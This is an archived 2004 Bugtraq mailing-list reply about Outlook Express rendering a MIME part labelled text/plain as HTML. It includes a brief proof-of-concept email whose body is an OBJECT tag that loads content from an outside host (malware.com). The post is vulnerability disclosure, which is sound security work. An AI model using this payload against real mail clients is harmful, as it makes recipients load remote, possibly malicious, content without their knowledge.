[35198] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: OBJECT Bugs or Features

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Jun 9 03:14:08 2004

Message-Id: <200406081821.i58ILfk5008313@web173.megawebservers.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 8 Jun 2004 18:21:41 -0000
From: "http-equiv@excite.com" <1@malware.com>
Reply-To: 1@malware.com

 <!-- 

The headers of your example Email message quite 
clearly claim the message is multipart/alternative and the first 
part (with the "incomplete" OBJECT tag) is text/html.  Thus, 
although the body of that MIME component is not a properly 
formed, complete HTML  document, the MIME Content-Type: headers 
provide a fairly strong basis for the MUA treating that message 
component as HTML and displaying it  accordingly.  

-->

and the Outlook Express unique ability to still do the 
impossible unpatched after three years:

MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

<img><object data=http://www.malware.com>

-- 
http://www.malware.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[35198] in bugtraq

Re: OBJECT Bugs or Features

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)Wed Jun 9 03:14:08 2004

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Jun 9 03:14:08 2004